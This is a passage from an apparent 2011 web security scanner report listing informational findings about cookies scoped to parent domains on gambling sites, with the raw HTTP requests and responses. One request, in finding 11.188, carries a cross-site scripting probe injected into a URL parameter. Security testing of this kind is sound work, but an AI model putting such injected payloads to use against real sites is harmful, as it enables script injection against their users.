Last-Modified: Mon, 16 May 2011 12:32:10 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="short
...[SNIP]...

11.177. http://www.primegrattage.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primegrattage.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.primegrattage.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:00:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON DSP COR CUR OUR PUB NOR UNI CNT"
X-Powered-By: ASP.NET
Content-Length: 27400
Content-Type: text/html
Set-Cookie: pscref=; expires=Thu, 10-May-2012 12:00:34 GMT; domain=.primegrattage.com; path=/
Set-Cookie: MTH=1072%2D100%2Dfr; expires=Wed, 15-Jun-2011 12:00:34 GMT; domain=.primegrattage.com; path=/
Set-Cookie: plstat=0; expires=Tue, 15-May-2012 12:00:34 GMT; domain=.primegrattage.com; path=/
Set-Cookie: ARC=130138; expires=Tue, 15-May-2012 12:00:34 GMT; domain=.primegrattage.com; path=/
Set-Cookie: ASPSESSIONIDCSTQTATQ=NDANCHNDBOKGLAFOAPEGFKFJ; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

11.178. http://www.primescratchcards.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.primescratchcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:40:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 29955
Content-Type: text/html
Set-Cookie: pscref=; expires=Thu, 10-May-2012 11:40:22 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: plstat=0; expires=Tue, 15-May-2012 11:40:22 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 11:40:22 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ASPSESSIONIDCQTRSBSQ=OHLOLGNDBFFPCKPGPEBMNJLJ; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.179. http://www.primescratchcards.com/HelpDepositMethods.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /HelpDepositMethods.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /HelpDepositMethods.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 28284
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:54 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.180. http://www.primescratchcards.com/InviteFriend.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /InviteFriend.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 26530
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:32 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.181. http://www.primescratchcards.com/Responsible.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /Responsible.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 23384
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:50 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.182. http://www.primescratchcards.com/SecurityAndPrivacy.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /SecurityAndPrivacy.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20508
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.183. http://www.primescratchcards.com/aboutus.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /aboutus.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aboutus.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 21887
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.184. http://www.primescratchcards.com/affiliates.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /affiliates.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /affiliates.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 23594
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:34 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.185. http://www.primescratchcards.com/contactus.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /contactus.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contactus.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:52 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 25485
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:52 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.186. http://www.primescratchcards.com/fairplay.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /fairplay.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fairplay.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22256
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.187. http://www.primescratchcards.com/help.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /help.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20735
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:34 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.188. http://www.primescratchcards.com/index.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /index.asp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.asp?curr=USD35af5%27%3balert(document.location)//d13433ff10e&g=3 HTTP/1.1
Host: www.primescratchcards.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/index.asp?curr=USD35af5%27%3balert(document.location)//d13433ff10e&g=3
Cookie: ARC=130137; pscref=; __utma=24585211.1553229019.1305549846.1305549846.1305549846.1; __utmb=24585211.1.10.1305549846; __utmc=24585211; __utmz=24585211.1305549846.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; plstat=0

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:45:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 30039
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:45:42 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: pscref=http%3A%2F%2Fwww%2Eprimescratchcards%2Ecom%2Findex%2Easp%3Fcurr%3DUSD35af5%2527%253balert%28document%2Elocation%29%2F%2Fd13433ff10e%26g%3D3; expires=Thu, 10-May-2012 12:45:42 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ASPSESSIONIDCQTRSBSQ=OCCAMGNDCGHEBKEEJCJBDFCH; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.189. http://www.primescratchcards.com/media.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /media.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:53 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22031
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:52 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.190. http://www.primescratchcards.com/playersclub.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /playersclub.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /playersclub.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 25777
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:32 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.191. http://www.primescratchcards.com/promotions.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /promotions.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 21865
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:32 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.192. http://www.primescratchcards.com/terms.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /terms.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /terms.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 57383
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.193. http://www.primescratchcards.com/underage.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /underage.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /underage.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20362
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:54 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.194. http://www.primescratchcards.com.br/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com.br
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.primescratchcards.com.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 24365
Content-Type: text/html
Set-Cookie: pscref=; expires=Thu, 10-May-2012 11:46:50 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: MTH=1072%2D100%2Dpt; expires=Wed, 15-Jun-2011 11:46:50 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: plstat=0; expires=Tue, 15-May-2012 11:46:50 GMT; domain=.primescratchcards.com.br; path=/
Set-Cookie: ARC=140053; expires=Tue, 15-May-2012 11:46:50 GMT; domain=.primescratchcards.com.br; path=/
Set-Cookie: ASPSESSIONIDCSTQTATQ=MKIMCHNDLBCPHFIMNELFEJOM; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.195. http://www.scratch2cash.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.scratch2cash.com
Proxy-Connection: keep-alive
